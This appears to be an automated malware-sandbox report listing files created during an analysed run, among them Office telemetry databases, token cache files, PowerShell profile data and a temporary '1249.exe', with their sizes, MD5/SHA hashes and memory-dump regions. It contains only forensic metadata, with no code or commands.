C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
e1296dfe2cf3638c45f0ccfe213c538e

SHA1
39b2b2ee19a86f9ea0732dc42368a3fcb25862bf

SHA256
45a432329d74d9a88aa6173a3e9bc951b52a0fdc0bf3fa2ebeb6413ef3b627e4

SHA512
2e1973bbc0723a1fdf859e584b46716ca68c184c2cf4292cdf341697cf9edee1321f05dd807d070becafcaff6bbf18c1da6410e3176aea012c20bcd8f532de56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal

Filesize
8KB

MD5
cf77c3216d30e5e8d4fe29ad3930f575

SHA1
03a219dd2ddaa147013037579a996f65ef411628

SHA256
6a8d5da3f98367d6bdad3af2be64059f266ecb95be509708afe4eac635e28350

SHA512
842853dc4ad367fafe75ef81f955447e48232ea9e4de62e66eefd360e7d911459062eba6af069bcc77388bf1838bcd775416b9fa39ca2fa1230906f44bb3484a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Filesize
2KB

MD5
d8f3b0cced672b6b072c19c45287ba05

SHA1
e1fa7608c81b0c6ddb8c095da0036d4a03227216

SHA256
ddf30bb091f9479678522754c8991cb90f4686fd31bda88a2d0763bbb8125cc8

SHA512
ab9190ebab5f7d10af95219b5656b6cfdbf36e17ce055113790d7139c3538203ebdadea64c5feecad1194ce74729914399c2f0c47ad7b42e2393e2a7d061fc6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
b78e4603f0454e955629305cf664efc1

SHA1
d808803f792a42f97fde5ac80c0dfb971756977f

SHA256
cacc1a5bafc4a6b938946e4bc32b2fb7ea5f3642497def22e4808b35d59ff7c5

SHA512
a1dd3d68552042f64bb5168dfe94f0ff628f1d842fd24fa6652a7fca666c5e69d7354c039ae842822af642cd3ea0f341a5458e2575951c170768fe9a59022ce1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ac902dcb52cf1e5b64743d0ed0635dbd

SHA1
f88a91c878f35374a7f7264de1594f3e1a4492b8

SHA256
3b31733ba1fbf536fd9c7c1641dc7b6f956b299838524955d9209f2d33fe5b24

SHA512
13fa35c6ff7857ab8051ab4e618e119de197d85b0bf8fa53eae70fe4e12003ff554c63d1618ffee1b19da8183172a37f0f686a9664012e3c1241f0b648bef13e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f33879a15ba6f499a4cb3335950356ef

SHA1
cf124a34bf07fbd0ab4d3d31e09a673f4bb4c187

SHA256
63493e6eab4fc08029b7e9f5c470ac3ab1fb2c77dc2b6ecc43470e2816fde70f

SHA512
5a03a3ccbb11129e29e330f0cc842afeb0d8f3a41d450c47ace77e26de1dc384ebf9bfcc346d18525c9a924c0a1c2ee43ac5922d016b8e80f517a1d9f96e2714

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f379f260c6ea6a9110ed51c89b88fba8

SHA1
d323518258406059b8f79e463e64ff4e63332671

SHA256
ac28e4cadc0af4d46b21189bb986fded2034ae5ff06eb743118ae85da7c048cd

SHA512
0ce72f38aeac62933bed311ba0e1ee71427f81fc03d6ad20519d42519e081595fb080d6a08c26d8cc28e0823291a809d178f49c4a1ad8d18c3135c4428ad287c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1117b4dfe785027b5dc8969fa45993b1

SHA1
578194db00505a19e3a2481055607fdea674c81c

SHA256
6dbd3930c4930bba7e64fc686d41a980c46232c15d576858ce6a62707107733d

SHA512
e69c5037404db1441c695dad8b4445150da243af0fee9e7d645455bf717e9e08e6c31038c27422e93b35d7201da38d5793d05fa6b7ace0f16441e54efa2b78ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c48511c388f86e61d337ab5f4c6164b8

SHA1
011c18669dc15e82efc4882e50bd455a47cb3b9c

SHA256
0a8699bc2041be5532666756496e5587ead45af8364ec08a637540b74f74710c

SHA512
af3bb093186dda2e41779957732a873b84465ef8fb26a0d3d5e0ca97e957044df2b365cd2456b455f3decbecf6b9da0f85df1c30a27cba938173ca596bd00a2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d638b00b54d0f44d1e3e5afda656f075

SHA1
da44b895e9919b59ae16e1936008fb8e27812902

SHA256
54e8de8388b9bc339ffc6a51fd4ce1ee7171f2716fc744781b4ff2841f651afa

SHA512
9dd739b320df8f10bbe6b280d1d74731cf6f451d155a882503872ad46e95dc48273f72795e2755276706e6139d2d6b9d6b1294ea68e0f0cf76cf48eeb515885b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bc01b6d970a6e3cafbb07e1079ae7ced

SHA1
4ce656693c5a56b04d7fcf5a7fd6303ded715b36

SHA256
811a05aa2509e3b5ad668509ef62655d63d3479ba64436861d59760f6b5b3dec

SHA512
ff50c6b794d405c0a98881e903bdf9fd2f7c770ec2fd01877d3dd4470c0c72ccfeec84831b27f1a474d3542c099ce5308fd7c391cc4b8bb0fd09724e2662d7f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1249.exe

Filesize
5KB

MD5
7853c56b88daec6a50138fa3572875bf

SHA1
85a2b15612566ec16128cc998f0a18656602dbaf

SHA256
b3e5056f37b791c68c9b14d54c5bf9b77c22f6f3563cd8f57a63b05c16a779c4

SHA512
fdd0239272874e818d7aacaccfd7b31471adba1e063ddbbf2d4c3930ed40aca9f1103ddb6b7355ba4a6598cac952b4ebca8218005610726ac38d6ab9f1dde3c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCDC349.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qz2apt4x.wmi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
8b2141561dd9b84a5c5c2624ccf22de4

SHA1
f6b220145452ac064e0fa07414a6b016d01e9c46

SHA256
437f4a1cef3343c9d36c235a06b64c45f519a401460619c064d53c13a4ab2b4f

SHA512
8d052331633904e402600d3caf5faa358187fb489d6e390bc178e78fe59a12797b9b417c226ffe31047817e3b18561d756ce0160be0a92d710d639486760736a

Download Submit
memory/224-171-0x00007FFDCCE10000-0x00007FFDCCE20000-memory.dmp

Filesize
64KB

Download
memory/224-37-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/224-38-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/224-36-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/224-170-0x00007FFDCCE10000-0x00007FFDCCE20000-memory.dmp

Filesize
64KB

Download
memory/224-169-0x00007FFDCCE10000-0x00007FFDCCE20000-memory.dmp

Filesize
64KB

Download
memory/224-168-0x00007FFDCCE10000-0x00007FFDCCE20000-memory.dmp

Filesize
64KB

Download
memory/224-174-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/1860-89-0x0000026089B10000-0x0000026089B32000-memory.dmp

Filesize
136KB

Download
memory/4168-13-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-9-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-18-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-11-0x00007FFDCA9E0000-0x00007FFDCA9F0000-memory.dmp

Filesize
64KB

Download
memory/4168-232-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-231-0x00007FFE0CE2D000-0x00007FFE0CE2E000-memory.dmp

Filesize
4KB

Download
memory/4168-12-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-5-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-10-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-265-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-0-0x00007FFDCCE10000-0x00007FFDCCE20000-memory.dmp

Filesize
64KB

Download
memory/4168-8-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-14-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-176-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-15-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-7-0x00007FFDCCE10000-0x00007FFDCCE20000-memory.dmp

Filesize
64KB

Download
memory/4168-6-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-2-0x00007FFDCCE10000-0x00007FFDCCE20000-memory.dmp

Filesize
64KB

Download
memory/4168-16-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-4-0x00007FFDCCE10000-0x00007FFDCCE20000-memory.dmp

Filesize
64KB

Download
memory/4168-17-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-3-0x00007FFDCCE10000-0x00007FFDCCE20000-memory.dmp

Filesize
64KB

Download
memory/4168-1-0x00007FFE0CE2D000-0x00007FFE0CE2E000-memory.dmp

Filesize
4KB

Download
memory/4168-20-0x00007FFE0CD90000-0x00007FFE0CF85000-memory.dmp

Filesize
2.0MB

Download
memory/4168-19-0x00007FFDCA9E0000-0x00007FFDCA9F0000-memory.dmp

Filesize
64KB

Download